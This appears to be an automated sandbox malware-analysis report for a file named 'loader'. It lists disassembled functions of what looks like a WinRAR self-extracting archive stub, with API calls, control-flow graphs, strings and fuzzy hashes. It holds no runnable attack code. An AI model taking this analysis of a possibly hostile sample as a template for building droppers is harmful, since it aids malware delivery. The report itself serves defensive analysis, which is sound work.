              • Opcode Fuzzy Hash: ec7ad05abe0155db142afead80b4a377a66a027473fdd7f62210b217ea03fe77
              • Instruction Fuzzy Hash: 38821B70908245AEDF25DF74C895BFAB7B9AF15300F0841B9E8D99B1C3DBB15A48CB60
              Function 0011AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 0011AEE5
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: H_prologItemTextWindow
              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
              • API String ID: 810644672-8108337
              • Opcode ID: bc5cfa184d6b37b1180f57e6de2a7797a2e68ece8545dedad6502743266994f7
              • Instruction ID: 14f4115168dd468fa1089cd34dc95693a14a0858eaca28f5f78dd91fe75199b6
              • Opcode Fuzzy Hash: bc5cfa184d6b37b1180f57e6de2a7797a2e68ece8545dedad6502743266994f7
              • Instruction Fuzzy Hash: 9D420674948354BEEB29ABB09CCAFFE7B7CAB16701F440064F645A64E1CBB449C4CB61
              Function 001100CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 257 1100cf-1100ee call 11e360 GetModuleHandleW 260 1100f0-110107 GetProcAddress 257->260 261 110154-1103b2 257->261 262 110121-110131 GetProcAddress 260->262 263 110109-11011f 260->263 264 110484-1104b3 GetModuleFileNameW call 10bc85 call 10fe56 261->264 265 1103b8-1103c3 call 1270dd 261->265 262->261 266 110133-110152 262->266 263->262 278 1104b5-1104bf call 10acf5 264->278 265->264 272 1103c9-1103fa GetModuleFileNameW CreateFileW 265->272 266->261 275 110478-11047f CloseHandle 272->275 276 1103fc-11040a SetFilePointer 272->276 275->264 276->275 279 11040c-110429 ReadFile 276->279 285 1104c1-1104c5 call 110085 278->285 286 1104cc 278->286 279->275 282 11042b-110450 279->282 284 11046d-110476 call 10fbd8 282->284 284->275 294 110452-11046c call 110085 284->294 291 1104ca 285->291 289 1104ce-1104d0 286->289 292 1104f2-110518 call 10bcfb GetFileAttributesW 289->292 293 1104d2-1104f0 CompareStringW 289->293 291->289 296 11051a-11051e 292->296 301 110522 292->301 293->292 293->296 294->284 296->278 300 110520 296->300 302 110526-110528 300->302 301->302 303 110560-110562 302->303 304 11052a 302->304 306 110568-11057f call 10bccf call 10acf5 303->306 307 11066f-110679 303->307 305 11052c-110552 call 10bcfb GetFileAttributesW 304->305 312 110554-110558 305->312 313 11055c 305->313 317 110581-1105e2 call 110085 * 2 call 10ddd1 call 10400a call 10ddd1 call 119f35 306->317 318 1105e7-11061a call 10400a AllocConsole 306->318 312->305 315 11055a 312->315 313->303 315->303 324 110667-110669 ExitProcess 317->324 318->324 325 11061c-110661 GetCurrentProcessId AttachConsole call 1235b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->325 325->324
              APIs
              • GetModuleHandleW.KERNEL32(kernel32), ref: 001100E4
              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001100F6
              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00110127
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001103D4
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001103F0
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00110402
              • ReadFile.KERNEL32(00000000,?,00007FFE,00133BA4,00000000), ref: 00110421
              • CloseHandle.KERNEL32(00000000), ref: 00110479
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0011048F
              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 001104E7
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00110510
              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0011054A
                • Part of subcall function 00110085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001100A0
                • Part of subcall function 00110085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0010EB86,Crypt32.dll,00000000,0010EC0A,?,?,0010EBEC,?,?,?), ref: 001100C2
              • _swprintf.LIBCMT ref: 001105BE
              • _swprintf.LIBCMT ref: 0011060A
                • Part of subcall function 0010400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0010401D
              • AllocConsole.KERNEL32 ref: 00110612
              • GetCurrentProcessId.KERNEL32 ref: 0011061C
              • AttachConsole.KERNEL32(00000000), ref: 00110623
              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00110649
              • WriteConsoleW.KERNEL32(00000000), ref: 00110650
              • Sleep.KERNEL32(00002710), ref: 0011065B
              • FreeConsole.KERNEL32 ref: 00110661
              • ExitProcess.KERNEL32 ref: 00110669
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
              • API String ID: 1201351596-3298887752
              • Opcode ID: 14d7348deeab63f6a347f97d4129b7659a24db40a9840f604bb428495418db0b
              • Instruction ID: 29e097ff278b7b3001b53896a420f1eeebc5e01a096ef816b7dea90ebe26a24f
              • Opcode Fuzzy Hash: 14d7348deeab63f6a347f97d4129b7659a24db40a9840f604bb428495418db0b
              • Instruction Fuzzy Hash: ECD195B1508384ABD3359F50DA49BDFBBE8BF84704F40092DF5A9A6140D7B496888F5B
              Function 0011BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 406 11bdf5-11be0d call 11e28c call 11e360 411 11ca90-11ca9d 406->411 412 11be13-11be3d call 11aa36 406->412 412->411 415 11be43-11be48 412->415 416 11be49-11be57 415->416 417 11be58-11be6d call 11a6c7 416->417 420 11be6f 417->420 421 11be71-11be86 call 1117ac 420->421 424 11be93-11be96 421->424 425 11be88-11be8c 421->425 427 11ca5c-11ca87 call 11aa36 424->427 428 11be9c 424->428 425->421 426 11be8e 425->426 426->427 427->416 439 11ca8d-11ca8f 427->439 429 11bea3-11bea6 428->429 430 11c132-11c134 428->430 431 11c115-11c117 428->431 432 11c074-11c076 428->432 429->427 438 11beac-11bf06 call 119da4 call 10b965 call 10a49d call 10a5d7 call 1070bf 429->438 430->427 436 11c13a-11c141 430->436 431->427 435 11c11d-11c12d SetWindowTextW 431->435 432->427 437 11c07c-11c088 432->437 435->427 436->427 440 11c147-11c160 436->440 441 11c08a-11c09b call 127168 437->441 442 11c09c-11c0a1 437->442 495 11c045-11c05a call 10a52a 438->495 439->411 447 11c162 440->447 448 11c168-11c176 call 1235b3 440->448 441->442 445 11c0a3-11c0a9 442->445 446 11c0ab-11c0b6 call 11ab9a 442->446 452 11c0bb-11c0bd 445->452 446->452 447->448 448->427 460 11c17c-11c185 448->460 458 11c0c8-11c0e8 call 1235b3 call 1235de 452->458 459 11c0bf-11c0c6 call 1235b3 452->459 483 11c101-11c103 458->483 484 11c0ea-11c0f1 458->484 459->458 464 11c187-11c18b 460->464 465 11c1ae-11c1b1 460->465 464->465 469 11c18d-11c195 464->469 471 11c1b7-11c1ba 465->471 472 11c296-11c2a4 call 10fe56 465->472 469->427 475 11c19b-11c1a9 call 10fe56 469->475 477 11c1c7-11c1e2 471->477 478 11c1bc-11c1c1 471->478 487 11c2a6-11c2ba call 1217cb 472->487 475->487 496 11c1e4-11c21e 477->496 497 11c22c-11c233 477->497 478->472 478->477 483->427 488 11c109-11c110 call 1235ce 483->488 485 11c0f3-11c0f5 484->485 486 11c0f8-11c100 call 127168 484->486 485->486 486->483 505 11c2c7-11c318 call 10fe56 call 11a8d0 GetDlgItem SetWindowTextW SendMessageW call 1235e9 487->505 506 11c2bc-11c2c0 487->506 488->427 512 11c060-11c06f call 10a4b3 495->512 513 11bf0b-11bf1f SetFileAttributesW 495->513 523 11c220 496->523 524 11c222-11c224 496->524 499 11c261-11c284 call 1235b3 * 2 497->499 500 11c235-11c24d call 1235b3 497->500 499->487 534 11c286-11c294 call 10fe2e 499->534 500->499 517 11c24f-11c25c call 10fe2e 500->517 539 11c31d-11c321 505->539 506->505 511 11c2c2-11c2c4 506->511 511->505 512->427 519 11bfc5-11bfd5 GetFileAttributesW 513->519 520 11bf25-11bf58 call 10b4f7 call 10b207 call 1235b3 513->520 517->499 519->495 529 11bfd7-11bfe6 DeleteFileW 519->529 549 11bf6b-11bf79 call 10b925 520->549 550 11bf5a-11bf69 call 1235b3 520->550 523->524 524->497 529->495 533 11bfe8-11bfeb 529->533 535 11bfef-11c01b call 10400a GetFileAttributesW 533->535 534->487 547 11bfed-11bfee 535->547 548 11c01d-11c033 MoveFileW 535->548 539->427 543 11c327-11c33b SendMessageW 539->543 543->427 547->535 548->495 551 11c035-11c03f MoveFileExW 548->551 549->512 556 11bf7f-11bfbe call 1235b3 call 11f350 549->556 550->549 550->556 551->495 556->519
              APIs
              • __EH_prolog.LIBCMT ref: 0011BDFA
                • Part of subcall function 0011AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0011AAFE
              • SetWindowTextW.USER32(?,?), ref: 0011C127
              • _wcsrchr.LIBVCRUNTIME ref: 0011C2B1
              • GetDlgItem.USER32(?,00000066), ref: 0011C2EC
              • SetWindowTextW.USER32(00000000,?), ref: 0011C2FC
              • SendMessageW.USER32(00000000,00000143,00000000,0014A472), ref: 0011C30A
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0011C335
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
              • API String ID: 3564274579-312220925
              • Opcode ID: 0ff558473ba4c9e76fc8affa2547db67fb6b6ae02d00f8354b4e361a5bddaf63
              • Instruction ID: ec93689946082c735d36956f66f7e3ad85a37abd4cd83bc9a18701765bd2b5e1
              • Opcode Fuzzy Hash: 0ff558473ba4c9e76fc8affa2547db67fb6b6ae02d00f8354b4e361a5bddaf63
              • Instruction Fuzzy Hash: 1CE17176D44628AADB29DBA0EC85DEF777CAF18311F0041B6F509E3091EB749AC48F90
              Function 0010D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 561 10d341-10d378 call 11e28c call 11e360 call 1215e8 568 10d37a-10d3a9 GetModuleFileNameW call 10bc85 call 10fe2e 561->568 569 10d3ab-10d3b4 call 10fe56 561->569 573 10d3b9-10d3dd call 109619 call 1099b0 568->573 569->573 580 10d7a0-10d7a6 call 109653 573->580 581 10d3e3-10d3eb 573->581 586 10d7ab-10d7bb 580->586 583 10d409-10d438 call 125a90 * 2 581->583 584 10d3ed-10d405 call 113781 * 2 581->584 595 10d43b-10d43e 583->595 594 10d407 584->594 594->583 596 10d444-10d44a call 109e40 595->596 597 10d56c-10d58f call 109d30 call 1235d3 595->597 601 10d44f-10d476 call 109bf0 596->601 597->580 606 10d595-10d5b0 call 109bf0 597->606 607 10d535-10d538 601->607 608 10d47c-10d484 601->608 622 10d5b2-10d5b7 606->622 623 10d5b9-10d5cc call 1235d3 606->623 609 10d53b-10d55d call 109d30 607->609 611 10d486-10d48e 608->611 612 10d4af-10d4ba 608->612 609->595 627 10d563-10d566 609->627 611->612 617 10d490-10d4aa call 125ec0 611->617 614 10d4e5-10d4ed 612->614 615 10d4bc-10d4c8 612->615 620 10d519-10d51d 614->620 621 10d4ef-10d4f7 614->621 615->614 619 10d4ca-10d4cf 615->619 633 10d52b-10d533 617->633 634 10d4ac 617->634 619->614 628 10d4d1-10d4e3 call 125808 619->628 620->607 630 10d51f-10d522 620->630 621->620 629 10d4f9-10d513 call 125ec0 621->629 631 10d5f1-10d5f8 622->631 623->580 639 10d5d2-10d5ee call 11137a call 1235ce 623->639 627->580 627->597 628->614 644 10d527 628->644 629->580 629->620 630->608 636 10d5fa 631->636 637 10d5fc-10d625 call 10fdfb call 1235d3 631->637 633->609 634->612 636->637 651 10d633-10d649 637->651 652 10d627-10d62e call 1235ce 637->652 639->631 644->633 653 10d731-10d757 call 10ce72 call 1235ce * 2 651->653 654 10d64f-10d65d 651->654 652->580 694 10d771-10d79d call 125a90 * 2 653->694 695 10d759-10d76f call 113781 * 2 653->695 657 10d664-10d669 654->657 659 10d97c-10d984 657->659 660 10d66f-10d678 657->660 664 10d98a-10d98e 659->664 665 10d72b-10d72e 659->665 662 10d684-10d68b 660->662 663 10d67a-10d67e 660->663 667 10d880-10d891 call 10fcbf 662->667 668 10d691-10d6b6 662->668 663->659 663->662 669 10d990-10d996 664->669 670 10d9de-10d9e4 664->670 665->653 686 10d976-10d979 667->686 687 10d897-10d8c0 call 10fe56 call 125885 667->687 674 10d6b9-10d6de call 1235b3 call 125808 668->674 675 10d722-10d725 669->675 676 10d99c-10d9a3 669->676 672 10d9e6-10d9ec 670->672 673 10da0a-10da2a call 10ce72 670->673 672->673 680 10d9ee-10d9f4 672->680 698 10da02-10da05 673->698 712 10d6e0-10d6ea 674->712 713 10d6f6 674->713 675->657 675->665 683 10d9a5-10d9a8 676->683 684 10d9ca 676->684 680->675 689 10d9fa-10da01 680->689 692 10d9c6-10d9c8 683->692 693 10d9aa-10d9ad 683->693 688 10d9cc-10d9d9 684->688 686->659 687->686 721 10d8c6-10d93c call 111596 call 10fdfb call 10fdd4 call 10fdfb call 1258d9 687->721 688->675 689->698 692->688 700 10d9c2-10d9c4 693->700 701 10d9af-10d9b2 693->701 694->580 695->694 700->688 707 10d9b4-10d9b8 701->707 708 10d9be-10d9c0 701->708 707->680 714 10d9ba-10d9bc 707->714 708->688 712->713 719 10d6ec-10d6f4 712->719 715 10d6f9-10d6fd 713->715 714->688 715->674 720 10d6ff-10d706 715->720 719->715 722 10d70c-10d71a call 10fdfb 720->722 723 10d7be-10d7c1 720->723 753 10d94a-10d95f 721->753 754 10d93e-10d947 721->754 728 10d71f 722->728 723->667 727 10d7c7-10d7ce 723->727 730 10d7d0-10d7d4 727->730 731 10d7d6-10d7d7 727->731 728->675 730->731 733 10d7d9-10d7e7 730->733 731->727 734 10d808-10d830 call 111596 733->734 735 10d7e9-10d7ec 733->735 743 10d832-10d84e call 1235e9 734->743 744 10d853-10d85b 734->744 737 10d805 735->737 738 10d7ee-10d803 735->738 737->734 738->735 738->737 743->728 747 10d862-10d87b call 10dd6b 744->747 748 10d85d 744->748 747->728 748->747 756 10d960-10d967 753->756 754->753 757 10d973-10d974 756->757 758 10d969-10d96d 756->758 757->756 758->728 758->757
              APIs
              • __EH_prolog.LIBCMT ref: 0010D346
              • _wcschr.LIBVCRUNTIME ref: 0010D367
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0010D328,?), ref: 0010D382
              • __fprintf_l.LIBCMT ref: 0010D873
                • Part of subcall function 0011137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0010B652,00000000,?,?,?,0001040A), ref: 00111396
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
              • API String ID: 4184910265-980926923
              • Opcode ID: 0715d45a4f2c795f111629b9c8ead9037c22c343a9e5a5a38bb65ae9dd0db22e
              • Instruction ID: 16bc3354b401af9d72877c74a209685fc55c259aaee9d2adf49f08e494fa86d4
              • Opcode Fuzzy Hash: 0715d45a4f2c795f111629b9c8ead9037c22c343a9e5a5a38bb65ae9dd0db22e
              • Instruction Fuzzy Hash: 1E12D2B19002199ADF24EFE4EC92BEEB7B5FF14304F10456AF595A71C1EBB09A44CB24
              Function 0011CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 0011AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0011AC85
                • Part of subcall function 0011AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0011AC96
                • Part of subcall function 0011AC74: IsDialogMessageW.USER32(0001040A,?), ref: 0011ACAA
                • Part of subcall function 0011AC74: TranslateMessage.USER32(?), ref: 0011ACB8
                • Part of subcall function 0011AC74: DispatchMessageW.USER32(?), ref: 0011ACC2
              • GetDlgItem.USER32(00000068,0015ECB0), ref: 0011CB6E
              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0011A632,00000001,?,?,0011AECB,00134F88,0015ECB0), ref: 0011CB96
              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0011CBA1
              • SendMessageW.USER32(00000000,000000C2,00000000,001335B4), ref: 0011CBAF
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0011CBC5
              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0011CBDF
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0011CC23
              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0011CC31
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0011CC40
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0011CC67
              • SendMessageW.USER32(00000000,000000C2,00000000,0013431C), ref: 0011CC76
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
              • String ID: \
              • API String ID: 3569833718-2967466578
              • Opcode ID: 8e8630beb87920b411754a9ed6e3506576f09a51f33bd69eb415f44c25d107cf
              • Instruction ID: 350f8bdb1893ddabd1b27ef66cad6c22ab8bc52f45a4e2f68e1f9399733a09a5
              • Opcode Fuzzy Hash: 8e8630beb87920b411754a9ed6e3506576f09a51f33bd69eb415f44c25d107cf
              • Instruction Fuzzy Hash: E631CF71185B41ABE311DF24DC4AFAF7FACEB82704F000518FA51965E1DBB45988CBB6
              Function 0011CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 795 11ce22-11ce3a call 11e360 798 11ce40-11ce4c call 1235b3 795->798 799 11d08b-11d093 795->799 798->799 802 11ce52-11ce7a call 11f350 798->802 805 11ce84-11ce91 802->805 806 11ce7c 802->806 807 11ce93 805->807 808 11ce95-11ce9e 805->808 806->805 807->808 809 11cea0-11cea2 808->809 810 11ced6 808->810 812 11ceaa-11cead 809->812 811 11ceda-11cedd 810->811 813 11cee4-11cee6 811->813 814 11cedf-11cee2 811->814 815 11ceb3-11cebb 812->815 816 11d03c-11d041 812->816 819 11cef9-11cf0e call 10b493 813->819 820 11cee8-11ceef 813->820 814->813 814->819 821 11cec1-11cec7 815->821 822 11d055-11d05d 815->822 817 11d043 816->817 818 11d036-11d03a 816->818 827 11d048-11d04c 817->827 818->816 818->827 830 11cf10-11cf1d call 1117ac 819->830 831 11cf27-11cf32 call 10a180 819->831 820->819 823 11cef1 820->823 821->822 828 11cecd-11ced4 821->828 824 11d065-11d06d 822->824 825 11d05f-11d061 822->825 823->819 824->811 825->824 827->822 828->810 828->812 830->831 838 11cf1f 830->838 836 11cf34-11cf4b call 10b239 831->836 837 11cf4f-11cf5c ShellExecuteExW 831->837 836->837 840 11cf62-11cf6f 837->840 841 11d08a 837->841 838->831 843 11cf71-11cf78 840->843 844 11cf82-11cf84 840->844 841->799 843->844 845 11cf7a-11cf80 843->845 846 11cf86-11cf8f 844->846 847 11cf9b-11cfba call 11d2e6 844->847 845->844 848 11cff1-11cffd CloseHandle 845->848 846->847 856 11cf91-11cf99 ShowWindow 846->856 847->848 862 11cfbc-11cfc4 847->862 849 11cfff-11d00c call 1117ac 848->849 850 11d00e-11d01c 848->850 849->850 863 11d072 849->863 854 11d079-11d07b 850->854 855 11d01e-11d020 850->855 854->841 860 11d07d-11d07f 854->860 855->854 861 11d022-11d028 855->861 856->847 860->841 864 11d081-11d084 ShowWindow 860->864 861->854 865 11d02a-11d034 861->865 862->848 866 11cfc6-11cfd7 GetExitCodeProcess 862->866 863->854 864->841 865->854 866->848 867 11cfd9-11cfe3 866->867 868 11cfe5 867->868 869 11cfea 867->869 868->869 869->848
              APIs
              • ShellExecuteExW.SHELL32(?), ref: 0011CF54
              • ShowWindow.USER32(?,00000000), ref: 0011CF93
              • GetExitCodeProcess.KERNEL32(?,?), ref: 0011CFCF
              • CloseHandle.KERNEL32(?), ref: 0011CFF5
              • ShowWindow.USER32(?,00000001), ref: 0011D084
                • Part of subcall function 001117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0010BB05,00000000,.exe,?,?,00000800,?,?,001185DF,?), ref: 001117C2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
              • String ID: $.exe$.inf
              • API String ID: 3686203788-2452507128
              • Opcode ID: c03fdc9141dba37bb1261e0a8f25962625fc9fc19ec4c265f933cae545652389
              • Instruction ID: 966a5db40c0c9ed0afd1ab033571adc6f927bd0a78b17dbcba40b465614804ea
              • Opcode Fuzzy Hash: c03fdc9141dba37bb1261e0a8f25962625fc9fc19ec4c265f933cae545652389
              • Instruction Fuzzy Hash: D0611670448781AAD7399F24E8006EBBBF6AF85300F04483DF5C597250D7B1D9C6CB92
              Function 0012A058 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 870 12a058-12a071 871 12a073-12a083 call 12e6ed 870->871 872 12a087-12a08c 870->872 871->872 879 12a085 871->879 874 12a099-12a0bd MultiByteToWideChar 872->874 875 12a08e-12a096 872->875 877 12a0c3-12a0cf 874->877 878 12a250-12a263 call 11ec4a 874->878 875->874 880 12a123 877->880 881 12a0d1-12a0e2 877->881 879->872 883 12a125-12a127 880->883 884 12a101-12a112 call 128518 881->884 885 12a0e4-12a0f3 call 131a30 881->885 887 12a245 883->887 888 12a12d-12a140 MultiByteToWideChar 883->888 884->887 898 12a118 884->898 885->887 897 12a0f9-12a0ff 885->897 892 12a247-12a24e call 12a2c0 887->892 888->887 891 12a146-12a158 call 12a72c 888->891 900 12a15d-12a161 891->900 892->878 899 12a11e-12a121 897->899 898->899 899->883 900->887 902 12a167-12a16e 900->902 903 12a170-12a175 902->903 904 12a1a8-12a1b4 902->904 903->892 905 12a17b-12a17d 903->905 906 12a200 904->906 907 12a1b6-12a1c7 904->907 905->887 910 12a183-12a19d call 12a72c 905->910 911 12a202-12a204 906->911 908 12a1e2-12a1f3 call 128518 907->908 909 12a1c9-12a1d8 call 131a30 907->909 916 12a23e-12a244 call 12a2c0 908->916 924 12a1f5 908->924 909->916 922 12a1da-12a1e0 909->922 910->892 925 12a1a3 910->925 915 12a206-12a21f call 12a72c 911->915 911->916 915->916 928 12a221-12a228 915->928 916->887 927 12a1fb-12a1fe 922->927 924->927 925->887 927->911 929 12a264-12a26a 928->929 930 12a22a-12a22b 928->930 931 12a22c-12a23c WideCharToMultiByte 929->931 930->931 931->916 932 12a26c-12a273 call 12a2c0 931->932 932->892
              APIs
